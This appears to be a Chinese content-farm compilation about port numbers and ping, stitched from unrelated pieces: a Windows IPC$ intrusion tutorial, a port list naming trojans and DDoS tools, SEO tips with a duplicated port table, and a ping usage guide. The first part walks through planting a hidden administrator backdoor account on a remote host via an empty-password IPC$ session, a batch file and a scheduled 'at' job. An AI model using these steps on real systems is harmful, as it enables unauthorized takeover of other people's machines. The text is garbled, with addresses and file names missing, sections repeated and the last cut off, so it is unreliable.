下面是范文网小编分享的ping端口号共6篇(Ping 端口号),供大家品鉴。
ping端口号共1
net view \\\\*.*.*.* 查看指定IP主机上的共享
nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表
copy \\\\*.*.*.*\\\\Admin$\\\\system32 即将当前目录下的复制到对方Admin$共享的System32目录内
建立IPC$连接
例子: net use \\\\\\\\ipc$ "" /user:"administrator" 查看帐号— net user 建立帐号— net user name pawd /add 删除帐号— net user name pawd /del 断开连接:
键入“net use * /del”命令断开所有的IPC$连接。键入“net use \\\\目标IP\\\\IPC$ /del”可以删除指定目标IP的IPC$连接。
实例:建立后门帐号,步骤如下: (1)编写BAT文件:
打开记事本,输入“net user emile /add”和“net localgroup administrators emile /add”,然后把文件另存为“”,保存在cmd当前默认目录下。 (2)与目标主机建立IPC$连接,以为例:
打开cmd窗口,分别执行命令:
net use \\\\\\\\ipc$ "" /user:"administrator" net use z: \\\\\\\\C$ (3)拷贝bat文件到目标主机:
在cmd窗口输入copy \\\\\\\\C$,把文件拷贝到目标位置;也可以打开映射驱动器用图形界面直接进行拷贝操作。 (4)通过计划任务使远程主机执行文件:
首先键入“net time \\\\IP”查看远程主机的系统时间,再键入“at \\\\IP TIME COMMAND”命令在远程主机上建立计划任务。
参数说明:IP—目标主机IP;TIME—设定计划任务执行的时间;COMMAND—计划任务要执行的命令,如此处为C:\\\\。
计划任务添加完毕后,使用命令“net use * /del”断开IPC$连接。 (5)验证帐号是否成功建立:
等待一段时间,当估计远程主机已经执行文件后,通过用新帐号建立IPC$连接来验证是否成功建立“emile”帐号,连接成功则说明帐号成功建立。
(3)获取目标主机上的用户信息:和X-Scan是常用的两款获取用户信息的工具。
是利用IPC$漏洞来查看目标主机用户信息的工具,通过USERINFO来查看目标主机用户信息的时候,并不需要事先建立IPC$空连接。 命令:USERINFO \\\\IP USER 用来查看目标IP上USER用户信息,然后根据反馈的结果进行具体分析。
扫描器也是利用目标主机存在的IPC$空连接漏洞,获取用户信息,用法略
net user 查看用户列表
net user 用户名 密码 /add 添加用户 net user 用户名 密码 更改用户密码
net localgroup administrators 用户名 /add 添加用户到管理组 net user 用户名 /delete 删除用户 net user 用户名 /delete 删除用户 net user 用户名 查看用户的基本情况 net user 用户名 /active:no 禁用该用户 net user 用户名 /active:yes 启用该用户
net share 查看计算机IPC$共享资源 net share 共享名 查看该共享的情况
net share 共享名=路径 设置共享。例如 net share c$=c: net share 共享名 /delete 删除IPC$共享
net use 查看IPC$连接情况
net use \\\\ip\\\\ipc$ "密码" /user:"用户名" ipc$连接
net time \\\\ip 查看远程计算机上的时间
copy 路径:\\\\文件名 \\\\ip\\\\共享名 复制文件到已经ipc$连接的计算机上
net view ip 查看计算机上的共享资源
ftp 服务器地址 进入FTP服务器
at 查看自己计算机上的计划作业
at \\\\ip 查看远程计算机上的计划作业
at \\\\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业 at \\\\ip 计划作业ID /delete 删除远程计算机上的一个计划作业 at \\\\ip all /delete 删除远程计算机上的全部计划作业
ping端口号共2
菊花论坛--IT认证家园 ? 『 思科认证 』 ? 《 CCNA CCDA 》 ? TCP/IP TCP/IP端口大全
所有已知的端口号,协议
TCP 1=TCP Port Service Multiplexer TCP 2=Death TCP 5=Remote Job Entry,yoyo TCP 7=Echo TCP 11=Skun TCP 12=Bomber TCP 16=Skun TCP 17=Skun TCP 18=消息传输协议,skun TCP 19=Skun TCP 20=FTP Data,Amanda TCP 21=文件传输,Back Construction,Blade Runner,Doly Trojan,Fore,FTP trojan,Invisible FTP,Larva, WebEx,WinCrash TCP 22=远程登录协议
TCP 23=远程登录(Telnet),Tiny Telnet Server (= TTS) TCP 25=电子邮件(SMTP),Ajan,Antigen,Email Paword Sender,Happy 99,Kuang2,ProMail trojan,Shtrilitz,Stealth,Tapiras,Terminator,WinPC,WinSpy,Haebu Coceda TCP 27=Aasin TCP 28=Amanda TCP 29=MSG ICP TCP 30=Agent TCP 31=Agent 31,Hackers Paradise,Masters Paradise,Agent TCP 37=Time,ADM worm TCP 39=SubSARI TCP 41=DeepThroat,Foreplay TCP 42=Host Name Server TCP 43=WHOIS TCP 44=Arctic TCP 48=DRAT TCP 49=主机登录协议 TCP 50=DRAT TCP 51=IMP Logical Addre Maintenance,Fuck Lamers Backdoor TCP 52=MuSka52,Skun TCP 53=DNS,Bonk (DOS Exploit) TCP 54=MuSka52 TCP 58=DMSetup TCP 59=DMSetup TCP 63=whois++ TCP 64=communications Integrator TCP 65=TACACS-Database Service TCP 66=Oracle SQL*NET,AL-Bareki TCP 67=Bootstrap Protocol Server TCP 68=Bootstrap Protocol Client TCP 69=,BackGate Kit,Nimda,Pasana,Storm,Storm worm,Theef, TCP 70=Gopher服务,ADM worm TCP 79=用户查询(Finger),Firehotcker,ADM worm TCP 80=超文本服务器(Http),Executor,RingZero TCP 81=Chubo, TCP 82=Netsky-Z TCP 88=Kerberos krb5服务 TCP 99=Hidden Port TCP 102=消息传输代理
TCP 108=SNA网关访问服务器 TCP 109=Pop2 TCP 110=电子邮件(Pop3),ProMail TCP 113=Kazimas, Auther Idnet TCP 115=简单文件传输协议
TCP 118=SQL Services, Infector TCP 119=新闻组传输协议(Newsgroup(Nntp)), Happy 99 TCP 121=JammerKiller, Bo jammerkillah TCP 123=网络时间协议(NTP),Net Controller TCP 129=Paword Generator Protocol TCP 133=Infector TCP 135=微软DCE RPC end-point mapper服务
TCP 137=微软Netbios Name服务(网上邻居传输文件使用) TCP 138=微软Netbios Name服务(网上邻居传输文件使用) TCP 139=微软Netbios Name服务(用于文件及打印机共享) TCP 142=NetTaxi TCP 143=IMAP TCP 146=FC Infector,Infector TCP 150=NetBIOS Seion Service TCP 156=SQL服务器 TCP 161=Snmp TCP 162=Snmp-Trap TCP 170=A-Trojan TCP 177=X Display管理控制协议 TCP 179=Border网关协议(BGP) TCP 190=网关访问控制协议(GACP) TCP 194=Irc TCP 197=目录定位服务(DLS) TCP 256=Nirvana TCP 315=The Invasor TCP 371=ClearCase版本管理软件
TCP 389=Lightweight Directory Acce Protocol (LDAP) TCP 396=Novell Netware over IP TCP 420=Breach TCP 421=TCP Wrappers TCP 443=安全服务
TCP 444=Simple Network Paging Protocol(SNPP) TCP 445=Microsoft-DS TCP 455=Fatal Connections TCP 456=Hackers paradise,FuseSpark TCP 458=苹果公司QuickTime TCP 513=Grlogin TCP 514=RPC Backdoor TCP 520=Rip TCP 531=Rasmin,Net666 TCP 544=kerberos kshell TCP 546=DHCP Client TCP 547=DHCP Server TCP 548=Macintosh文件服务
TCP 555=Ini-Killer,Phase Zero,Stealth Spy TCP 569=MSN TCP 605=SecretService TCP 606=Noknok8 TCP 660=DeepThroat TCP 661=Noknok8 TCP 666=Attack FTP,Satanz Backdoor,Back Construction,Dark Connection Inside TCP 667= TCP 668=Noknok6 TCP 669=DP trojan TCP 692=GayOL TCP 707=Welchia,nachi TCP 777=AIM Spy TCP 808=RemoteControl,WinHole TCP 815=Everyone Darling TCP 901= TCP 911=Dark Shadow TCP 993=IMAP TCP 999=DeepThroat TCP 1000=Der Spaeher TCP 1001=Silencer,WebEx,Der Spaeher TCP 1003=BackDoor TCP 1010=Doly TCP 1011=Doly TCP 1012=Doly TCP 1015=Doly TCP 1016=Doly TCP 1020=Vampire TCP 1023= TCP 1024=(YAI) TCP 1059=nimreg //TCP 1025=,Unused Windows Services Block //TCP 1026=Unused Windows Services Block //TCP 1027=Unused Windows Services Block //TCP 1028=Unused Windows Services Block //TCP 1029=Unused Windows Services Block //TCP 1030=Unused Windows Services Block //TCP 1033=Netspy //TCP 1035=Multidropper //TCP 1042=Bla //TCP 1045=Rasmin //TCP 1047=GateCrasher //TCP 1050=Minicommand TCP 1058=nim TCP 1069= TCP 1070=Voice,Psyber Stream Server,Streaming Audio Trojan TCP 1079=ASPROVATalk TCP 1080=Wingate,, //TCP 1090=Xtreme, VDOLive //TCP 1092=LoveGate //TCP 1095=Rat //TCP 1097=Rat //TCP 1098=Rat //TCP 1099=Rat TCP 1109=Pop with Kerberos TCP 1110=nfsd-keepalive TCP 1111= TCP 1155=Network File Acce //TCP 1170=Psyber Stream Server,Streaming Audio trojan,Voice //TCP 1200=NoBackO //TCP 1201=NoBackO //TCP 1207=Softwar //TCP 1212=Nirvana,Visul Killer //TCP 1234=Ultors //TCP 1243=BackDoor-G, SubSeven, SubSeven Apocalypse //TCP 1245=VooDoo Doll //TCP 1269=Mavericks Matrix //TCP 1313=Nirvana //TCP 1349=BioNet TCP 1352=Lotus Notes TCP 1433=Microsoft SQL Server TCP 1434=Microsoft SQL Monitor //TCP 1441=Remote Storm //TCP 1492=FTP99CMP() TCP 1503=NetMeeting //TCP 1509=Psyber Streaming Server TCP 1570=Orbix Daemon //TCP 1600=Shivka-Burka //TCP 1703=Exloiter TCP 1720=NetMeeting call Setup TCP 1731=NetMeeting音频调用控制
TCP 1745=ISA Server proxy autoconfig, Remote Winsock //TCP 1807=SpySender TCP 1906=Backdoor/ TCP 1907=Backdoor/ //TCP 1966=Fake FTP 2000 //TCP 1976=Custom port //TCP 1981=Shockrave TCP 1990=stun-p1 cisco STUN Priority 1 port TCP 1990=stun-p1 cisco STUN Priority 1 port TCP 1991=stun-p2 cisco STUN Priority 2 port TCP 1992=stun-p3 cisco STUN Priority 3 port,ipsendmsg IPsendmsg TCP 1993=snmp-tcp-port cisco SNMP TCP port TCP 1994=stun-port cisco serial tunnel port TCP 1995=perf-port cisco perf port TCP 1996=tr-rsrb-port cisco Remote SRB port TCP 1997=gdp-port cisco Gateway Discovery Protocol TCP 1998=x25-svc-port cisco service (XOT) //TCP 1999=BackDoor, TransScout //TCP 2000=Der Spaeher,INsane Network TCP 2002= @mm //TCP 2001=Transmion scout //TCP 2002=Transmion scout //TCP 2003=Transmion scout //TCP 2004=Transmion scout //TCP 2005=TTransmion scout TCP 2011=cypre TCP 2015=raid-cs //TCP 2023=Ripper,Pa Ripper,Hack City Ripper Pro TCP 2049=NFS //TCP 2115=Bugs //TCP 2121=Nirvana //TCP 2140=Deep Throat, The Invasor //TCP 2155=Nirvana //TCP 2208=RuX //TCP 2255=Illusion Mailer //TCP 2283=HVL Rat5 //TCP 2300=PC Explorer //TCP 2311=Studio54 TCP 2556= //TCP 2565=Striker //TCP 2583=WinCrash //TCP 2600=Digital RootBeer //TCP 2716=Prayer Trojan TCP 2745= //TCP 2773=Backdoor,SubSeven //TCP 2774=& //TCP 2801=Phineas Phucker TCP 2967=SSC Agent //TCP 2989=Rat //TCP 3024=WinCrash trojan TCP 3127= TCP 3128=RingZero, //TCP 3129=Masters Paradise //TCP 3150=Deep Throat, The Invasor TCP 3198= //TCP 3210=SchoolBus TCP 3332= TCP 3333=Prosiak TCP 3389=超级终端 //TCP 3456=Terror //TCP 3459=Eclipse 2000 //TCP 3700=Portal of Doom //TCP 3791=Eclypse //TCP 3801=Eclypse TCP 3996=Portal of Doom,RemoteAnything TCP 4000=腾讯QQ客户端
TCP 4060=Portal of Doom,RemoteAnything TCP 4092=WinCrash TCP 4242=VHM TCP 4267=& TCP 4321=BoBo TCP 4444=Prosiak,Swift remote TCP 4500= TCP 4567=File Nail TCP 4661=Backdoor/ TCP 4590=ICQTrojan TCP 4899=Remote Administrator服务器 TCP 4950=ICQTrojan TCP 5000=WindowsXP服务器,Blazer 5,Bubbel,Back Door Setup,Sockets de Troie TCP 5001=Back Door Setup, Sockets de Troie TCP 5002=cd00r,Shaft TCP 5011=One of the Last Trojans (OOTLT) TCP 5025=WM Remote KeyLogger TCP 5031=Firehotcker,Metropolitan,NetMetro TCP 5032=Metropolitan TCP 5190=ICQ Query TCP 5321=Firehotcker TCP 5333=Backage Trojan Box 3 TCP 5343=WCrat TCP 5400=Blade Runner, TCP 5401=Blade Runner,Back Construction TCP 5402=Blade Runner,Back Construction TCP 5471=WinCrash TCP 5512=Illusion Mailer TCP 5521=Illusion Mailer TCP 5550=Xtcp,INsane Network TCP 5554= TCP 5555=ServeMe TCP 5556=BO Facil TCP 5557=BO Facil TCP 5569=Robo-Hack TCP 5598=BackDoor TCP 5631=PCAnyWhere data TCP 5632=PCAnyWhere TCP 5637=PC Crasher TCP 5638=PC Crasher TCP 5698=BackDoor TCP 5714=Wincrash3 TCP 5741=WinCrash3 TCP 5742=WinCrash TCP 5760=Portmap Remote Root Linux Exploit TCP 5880=Y3K RAT TCP 5881=Y3K RAT TCP 5882=Y3K RAT TCP 5888=Y3K RAT TCP 5889=Y3K RAT TCP 5900=WinVnc TCP 6000= TCP 6006=Noknok8 TCP 6129=Dameware Nt Utilities服务器 TCP 6272=SecretService TCP 6267=广外女生
TCP 6400=,The Thing TCP 6500=Devil TCP 6661=Teman TCP 6666= TCP 6667=NT Remote Control,Wise 播放器接收端口 TCP 6668=Wise Video广播端口 TCP 6669=Vampyre TCP 6670=DeepThroat,iPhone TCP 6671=Deep Throat TCP 6711=SubSeven TCP 6712= TCP 6713=SubSeven TCP 6723=Mstream TCP 6767=NT Remote Control TCP 6771=DeepThroat TCP 6776=BackDoor-G,SubSeven,2000 Cracks TCP 6777= TCP 6789=Doly Trojan TCP 6838=Mstream TCP 6883=DeltaSource TCP 6912=Shit Heep TCP 6939=Indoctrination TCP 6969=GateCrasher, Priority, IRC 3 TCP 6970=RealAudio,GateCrasher TCP 7000=Remote Grab,NetMonitor, TCP 7001=Freak88 TCP 7201=NetMonitor TCP 7215=BackDoor-G, SubSeven TCP 7001=Freak88,Freak2k TCP 7300=NetMonitor TCP 7301=NetMonitor TCP 7306=NetMonitor,NetSpy TCP 7307=NetMonitor, ProcSpy TCP 7308=NetMonitor, X Spy TCP 7323=Sygate服务器端 TCP 7424=Host Control TCP 7511=聪明基因 TCP 7597=Qaz TCP 7609=Snid X2 TCP 7626=冰河
TCP 7777=The Thing TCP 7789=Back Door Setup, ICQKiller TCP 7983=Mstream TCP 8000=腾讯OICQ服务器端,XDMA TCP 8010=Wingate,Logfile TCP 8011= TCP 8080=WWW 代理,Ring Zero,Chubo, TCP 8102=网络神偷
TCP [email=8181=@mm]8181=@mm[/email] TCP 8520= TCP 8594=I-Worm/ TCP 8787=BackOfrice 2000 TCP 8888=Winvnc TCP 8897=Hack Office,Armageddon TCP 8989=Recon TCP 9000=Netministrator TCP 9325=Mstream TCP 9400=Incommand TCP 9401=Incommand TCP 9402=Incommand TCP 9872=Portal of Doom TCP 9873=Portal of Doom TCP 9874=Portal of Doom TCP 9875=Portal of Doom TCP 9876=Cyber Attacker TCP 9878=TransScout TCP 9989=Ini-Killer TCP 9898= TCP 9999=Prayer Trojan TCP =Portal of Doom TCP = TCP =Syphillis TCP =Syphillis TCP =Syphillis TCP =BrainSpy TCP =Portal Of Doom TCP =.c, TCP =Acid Shivers TCP =coma trojan TCP =Ambush TCP =Senna Spy TCP =Host Control TCP =Host Control TCP =Progenic,Hack '99KeyLogger TCP =TROJ_ TCP =Gjamer, TCP =Hack'99 KeyLogger TCP =GabanBus, NetBus /, Pie Bill Gates, X-bill TCP =GabanBus, NetBus /, X-bill TCP =BioNet TCP =Whack-a-mole TCP =Whack-a-mole TCP =Whack-a-mole TCP [email==W32/Gibe@MM]=W32/Gibe@MM[/email] TCP =NetBus TCP =DUN Control TCP =Buttman TCP =WhackJob, TCP =Eclipse2000 TCP =Mstream TCP =Senna Spy TCP =Hacker Brazil TCP =Psychward TCP =Tribal Voice的聊天程序PowWow TCP =Kuang2 The Virus TCP =Solero TCP =PC Invader TCP =PC Invader TCP =PC Invader TCP =PC Invader TCP =NetDaemon TCP =Host Control TCP =Mstream TCP =Mosucker TCP =Stacheldraht (DDoS) TCP =ICQ Revenge TCP =Priority TCP =Priority TCP =提供广告服务的Conducent"adbot"共享软件 TCP =Mosaic TCP =Kuang2 The Virus TCP =CrazyNet TCP =CrazyNet TCP =Infector + TCP =Nephron TCP =Shaft (DDoS) TCP =蓝色火焰 TCP =ICQ Revenge TCP =Millennium II (GrilFriend) TCP =Millennium II (GrilFriend) TCP =AcidkoR TCP =NetBus 2 Pro TCP =Lovgate TCP =Logged,Chupacabra TCP =Bla TCP =Shaft (DDoS) TCP = TCP =Tribal Flood Network,Trinoo TCP =Schwindler ,GirlFriend TCP =Schwindler ,GirlFriend,Exloiter TCP =Prosiak,RuX Uploader TCP = TCP =Asylum TCP =网络公牛
TCP =Evil FTP, Ugly FTP, WhackJob TCP =Donald Dick TCP =Donald Dick TCP =INet Spy TCP =Delta TCP =Spy Voice TCP =Sub Seven +, TCP =Tribal Flood Network,Trinoo TCP =Tribal Flood Network,Trinoo TCP =Hack Attack TCP =Hack Attack TCP =Host Control TCP =TROJ_ TCP =The Unexplained TCP =Terr0r32 TCP =Death,Lamers Death TCP =AOL trojan TCP =NetSphere ,NetSphere TCP =NetSphere ,NetSphere TCP =NetSphere ,NetSphere TCP =NetSphere TCP =Sockets de Troie TCP = TCP =Intruse TCP =Kuang2 TCP =Bo Whack TCP =Baron Night,BO client,BO2,Bo Facil,BackFire,Back Orifice,DeepBO,Freak2k,NetSpy TCP =NetSpy,Back Orifice,DeepBO TCP =NetSpy DK TCP =Schwindler TCP =BOWhack TCP =Hack Attack TCP =Hack Attack TCP =Hack Attack TCP =Hack Attack TCP =Hack Attack TCP =Hack Attack TCP =PeanutBrittle TCP =Acid Battery TCP =Prosiak,Blakharaz TCP =Son Of Psychward TCP =Son Of Psychward TCP =Spirit 2001a TCP =BigGluck,TN,Tiny Telnet Server TCP =Trin00 (Windows) (DDoS) TCP =Trin00 (Windows) (DDoS) TCP = TCP =YAT TCP =The Spy TCP =Agent ,Masters TCP =Masters Paradise TCP =Masters TCP =Masters Paradise TCP =Masters Paradise TCP =Remote Boot TCP =Schoolbus / TCP =Delta Source TCP =Happypig TCP =未知代理 TCP =Prosiak TCP =Delta TCP =BirdSpy2 TCP =Online Keylogger TCP =Sockets de Troie TCP =Fore, Schwindler TCP =CafeIni TCP =Remote Windows Shutdown TCP =Acid Battery 2000 TCP =Back Door-G, Sub7 TCP =Back Orifice 2000,Sheep TCP =School Bus .,Sheep, BO2K TCP =NetRaider TCP = TCP = TCP =ButtFunnel TCP = TCP =Deep Throat TCP =Xzip TCP =Connection TCP =TROJ_ TCP =Telecommando TCP =Bunker-kill TCP =Bunker-kill TCP =Devil, DDoS TCP =Th3tr41t0r, The Traitor TCP =TROJ_ TCP =RC,Adore Worm/Linux TCP =ShitHeep TCP =Armageddon,Hack Office UDP 1=Sockets des Troie UDP 9=Chargen UDP 19=Chargen UDP 69=Pasana UDP 80=Penrox UDP 371=ClearCase版本管理软件
UDP 445=公共Internet文件系统(CIFS) UDP 500=Internet密钥交换
UDP 1025=Maverick's Matrix - UDP 1026=Remote Explorer 2000 UDP 1027=UC聊天软件, UDP 1028=3721上网助手(用途不明,建议用户警惕!),KiLo,SubSARI UDP 1029=SubSARI UDP 1031=Xot UDP 1032=Akosch4 UDP 1104=RexxRave UDP 1111=Daodan UDP 1116=Lurker UDP 1122=Last 2000,Singularity UDP 1183=Cyn,SweetHeart UDP 1200=NoBackO UDP 1201=NoBackO UDP 1342=BLA trojan UDP 1344=Ptakks UDP 1349=BO dll UDP 1561=MuSka52 UDP 1772=NetControle UDP 1978=Slapper UDP 1985=Black Diver UDP 2000=A-trojan,Fear,Force,GOTHIC Intruder,Last 2000,Real 2000 UDP 2001=Scalper UDP 2002=Slapper UDP 2015=raid-cs UDP 2018=rellpack UDP 2130=Mini BackLash UDP 2140=Deep Throat,Foreplay,The Invasor UDP 2222=SweetHeart,Way,Backdoor/ UDP 2339=Voice Spy UDP 2702=Black Diver UDP 2989=RAT UDP 3150=Deep Throat UDP 3215=XHX UDP 3333=Daodan UDP 3801=Eclypse UDP 3996=Remote Anything UDP 4128=RedShad UDP 4156=Slapper UDP 4500=sae-urn UDP 5419=DarkSky UDP 5503=Remote Shell Trojan UDP 5555=Daodan UDP 5882=Y3K RAT UDP 5888=Y3K RAT UDP 6112= Game UDP 6666=KiLo UDP 6667=KiLo UDP 6766=KiLo UDP 6767=KiLo,UandMe UDP 6838=Mstream Agent-handler UDP 7028=未知木马 UDP 7424=Host Control UDP 7788=Singularity UDP 7983=MStream handler-agent UDP 8012=Ptakks UDP 8090=Aphex's Remote Packet Sniffer UDP 8127=9_119,Chonker UDP 8488=KiLo UDP 8489=KiLo UDP 8787=BackOrifice 2000 UDP 8879=BackOrifice 2000 UDP 9325=MStream Agent-handler UDP =XHX UDP =Portal of Doom UDP =Syphillis UDP =Slapper UDP =Portal of Doom UDP =Mstream UDP =Ambush UDP =Cyn UDP =Proto UDP =BlueIce 2000 UDP [email==W32/Gibe@MM]=W32/Gibe@MM[/email] UDP =ButtMan,DUN Control UDP =UDP remote shell backdoor server UDP =KiLo UDP =KiLo UDP =KiLo UDP =Shaft handler to Agent UDP =Shaft UDP =GirlFriend UDP = UDP =Donald Dick UDP =MOTD UDP =Delta Source UDP =Sub-7 UDP =Trin00/TFN2K UDP =Sub-7 UDP =Alvgus trojan 2000 UDP =Trinoo UDP =KiLo UDP =The Unexplained UDP =NetSphere UDP =Little Witch UDP =Trin00 DoS Attack UDP =Baron Night, BO client, BO2, Bo Facil, BackFire, Back Orifice, DeepBO UDP =Back Orifice, NetSpy DK, DeepBO UDP =Little Witch UDP =Little Witch UDP =Lithium UDP =Hack aTack UDP =Hack aTack UDP =Hack aTack UDP =Hack aTack UDP =未知木马 UDP =Trinoo UDP =Trinoo UDP =KiLo UDP =Iani UDP =School Bus UDP =Taskman UDP =Delta Source UDP =KiLo UDP =OnLine keyLogger UDP =Fenster UDP =KiLo UDP =Omega UDP =Back Orifice UDP =Back Orifice 2000 UDP =NetRaider Trojan UDP =KiLO UDP =KiLO UDP =KiLO UDP =The Traitor
ping端口号共3
作为一名站长,当大家发表了新的(尤其是原创)文章时,大家心里面首先想到的,我想不一例外是,搜索引擎怎么才能快速爬取我的文章呢?当然,如果你是高权重网站,请点击右上角的XX,如果你是新人,或是被这个问题迷惑的人,那么,今天就让蜗牛SEO来给你分享一下自己的方法吧!被搜索引擎快速爬取主要有如下六种方法:
1.使用搜索引擎的ping服务。
你可以采取手动通知和自动通知两种方式使用ping服务:
手动ping:访问搜索引擎的ping页面,在输入框中输入博客地址或者feed地址,点击“提交博客”按钮即可。
自动ping:如果您的博客程序支持自动ping功能,您只需把百度的Ping服务地址配置到你的Blog发布后台或者客户端程序中,就可以实现自动通知的功能。
以下为各家搜索引擎的ping服务地址:
百度:
谷歌:
搜狗:
(2).SOCKS代理协议服务器常用端口号:1080 (3).FTP(文件传输)协议代理服务器常用端口号:21 (4).Telnet(远程登录)协议代理服务器常用端口:23
HTTP服务器,默认的端口号为80/tcp(木马Executor开放此端口);
HTTPS(securely transferring web pages)服务器,默认的端口号为443/tcp 443/udp;
Telnet(不安全的文本传送),默认端口号为23/tcp(木马Tiny Telnet Server所开放的端口);
fTP,默认的端口号为21/tcp(木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口);
TFTP(Trivial File Transfer Protocol ),默认的端口号为69/udp;
SSH(安全登录)、SCP(文件传输)、端口重定向,默认的端口号为22/tcp;
SMTP Simple Mail Transfer Protocol (E-mail),默认的端口号为25/tcp(木马Antigen、Email Paword Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口);
POP3 Post Office Protocol (E-mail) ,默认的端口号为110/tcp;
WebLogic,默认的端口号为7001;
Webshpere应用程序,默认的端口号为9080;
Webshpere管理工具,默认的端口号为9090;
JBOSS,默认的端口号为8080;
TOMCAT,默认的端口号为8080;
WIN2003远程登陆,默认的端口号为3389;
Symantec AV/Filter for MSE ,默认端口号为 8081;
Oracle 数据库,默认的端口号为1521;
ORACLE EMCTL,默认的端口号为1158;
Oracle XDB( XML 数据库),默认的端口号为8080;
Oracle XDB FTP服务,默认的端口号为2100;
MS SQL*SERVER数据库server,默认的端口号为1433/tcp 1433/udp;
MS SQL*SERVER数据库monitor,默认的端口号为1434/tcp 1434/udp;
QQ,默认的端口号为1080/udp.代理服务器常用以下端口:
(1).HTTP
协议代理服务器常用端口号:80/8080/3128/8081/9080
(2).SOCKS代理协议服务器常用端口号:1080 (3).FTP(文件传输)协议代理服务器常用端口号:21 (4).Telnet(远程登录)协议代理服务器常用端口:23
HTTP服务器,默认的端口号为80/tcp(木马Executor开放此端口);
HTTPS(securely transferring web pages)服务器,默认的端口号为443/tcp 443/udp;
Telnet(不安全的文本传送),默认端口号为23/tcp(木马Tiny Telnet Server所开放的端口);
fTP,默认的端口号为21/tcp(木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口);
TFTP(Trivial File Transfer Protocol ),默认的端口号为69/udp;
SSH(安全登录)、SCP(文件传输)、端口重定向,默认的端口号为22/tcp;
SMTP Simple Mail Transfer Protocol (E-mail),默认的端口号为25/tcp(木马Antigen、Email Paword Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口);
POP3 Post Office Protocol (E-mail) ,默认的端口号为110/tcp;
WebLogic,默认的端口号为7001;
Webshpere应用程序,默认的端口号为9080;
Webshpere管理工具,默认的端口号为9090;
JBOSS,默认的端口号为8080;
TOMCAT,默认的端口号为8080; WIN2003远程登陆,默认的端口号为3389;
Symantec AV/Filter for MSE ,默认端口号为 8081;
Oracle 数据库,默认的端口号为1521;
ORACLE EMCTL,默认的端口号为1158;
Oracle XDB( XML 数据库),默认的端口号为8080;
Oracle XDB FTP服务,默认的端口号为2100;
MS SQL*SERVER数据库server,默认的端口号为1433/tcp 1433/udp;
MS SQL*SERVER数据库monitor,默认的端口号为1434/tcp 1434/udp;
QQ,默认的端口号为1080/udp.
(注:本数据收集于中国黑客联盟)
ping端口号共4
Ping使用方法大全 首先从什么是Ping讲起吧! 什么是Ping Ping是典型的网络工具。Ping 是Windows系列自带的一个可执行命令,从98到最新的2003 Server版的计算机都带有这个命令行工具。Ping能够辨别网络功能的某些状态。这些网络功能的状态是日常网络故障诊断的基础。特别是Ping能够识别连接的二进制状态(也就是是否连通)。Ping 命令通过向计算机发送 ICMP 回应报文并且监听回应报文的返回,以校验与远程计算机或本地计算机的连接。对于每个发送报文, Ping 最多等待 1 秒,并打印发送和接收把报文的数量。比较每个接收报文和发送报文,以校验其有效性。默认情况下,发送四个回应报文,每个报文包含 64 字节的数据。Ping向目标主机(地址)发送一个回送请求数据包,要求目标主机收到请求后给予答复,从而判断网络的响应时间和本机是否与目标主机(地址)联通。
Ping命令
校验与远程计算机或本地计算机的连接。只有在安装 TCP/IP 协议之后才能使用该命令。(TCP/IP 协议应该知道装吧,装系统时就有了,如果万一删了怎么办?还能怎么办,重新装吧!!怎样装,以后再说。。呵呵~~~)
Ping ip [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
参数 -t ( 校验与指定计算机的连接,直到用户中断。若要中断可按快捷键:CTRL+C)
-a ( 将地址解析为计算机名。 )
-n count (发送由 count 指定数量的 ECHO 报文,默认值为 4。 )
-l length (发送包含由 length 指定数据长度的 ECHO 报文。默认值为 64 字节,最大值为 8192 字节。)
-f (在包中发送“不分段”标志。该包将不被路由上的网关分段。)
-i ttl (将“生存时间”字段设置为 ttl 指定的数值。其中:ttl: 表示从1到255之间的数)
-v tos (将“服务类型”字段设置为 tos 指定的数值。 )
-r count (在“记录路由”字段中记录发出报文和返回报文的路由。指定的 Count 值最小可以是 1,最大可以是 9 。 ) 例:
c:\\\\Documents and Settings\\\\Administrator>ping -r 4 Pinging with 32 bytes of data: Reply from : bytes=32 time
Ping命令有两种返回结果:
1、“Request timed out.”表示没有收到目标主机返回的响应数据包,也就是网络不通或网络状态恶劣
2、“Reply from : bytes=32 time
3、“Destination host unreachable”表示目标主机无法到达
4、“PING: transmit failed,error code XXXXX”表示传输失败,错误代码XXXXX
-s count (指定由 count 指定的转发次数的时间邮票。其中指定的 Count 值最小可以是 1,最大可以是 4 。)
例:
c:\\\\Documents and Settings\\\\Administrator>ping -s 3 Pinging with 32 bytes of data: Reply from : bytes=32 time
-k computer-list (经过由 computer-list 指定的计算机列表的路由报文。中间网关可能分隔连续的计算机(严格源路由)。允许的最大 IP 地址数目是 9 。)
-w timeout (以毫秒为单位指定超时间隔。 )
destination-list (指定要校验连接的远程计算机)
使用PING判断TCP/IP故障
可以使用 Ping 实用程序测试计算机名和 IP 地址。如果能够成功校验 IP 地址却不能成功校验计算机名,则说明名称解析存在问题。
1、Ping :
是本地循环地址,如果本地址无法Ping通,则表明本地机TCP/IP协议不能正常工作。
2、Ping本机的IP地址:
用IPConfig查看本机IP,然后Ping该IP,通则表明网络适配器(网卡或MODEM)工作正常,不通则是网络适配器出现故障。
3、Ping同网段计算机的IP:
Ping一台同网段计算机的IP,不通则表明网络线路出现故障;若网络中还包含有路由器,则应先Ping路由器在本网段端口的IP,不通则此段线路有问题;通则再PING路由器在目标计算机所在网段的端口IP,不通则是路由出现故障;通则再Ping目的机IP地址。
4、Ping网址:
若要检测一个带DNS服务的网络,在上一步Ping通了目标计算机的IP地址后,仍无法连接到该机,则可PING该机的网络名,比如Ping ,正常情况下会出现该网址所指向的IP,这表明本机的DNS设置正确而且DNS服务器工作正常,反之就可能是其中之一出现了故障;同样也可通过Ping计算机名检测WINS解析的故障(WINS是将计算机名解析到IP地址的服务)。
利用Ping命令判定网络故障 本机IP
例如本机IP地址为:。则执行命令Ping 。如果网卡安装配置没有问题,则应有类似下列显示:
c:\\\\Documents and Settings\\\\Administrator>ping Pinging with 32 bytes of data: Reply from : bytes=32 time
网关IP
假定网关IP为:,则执行命令Ping 。在MS-DOS方式下执行此命令,如果显示类似以下信息:
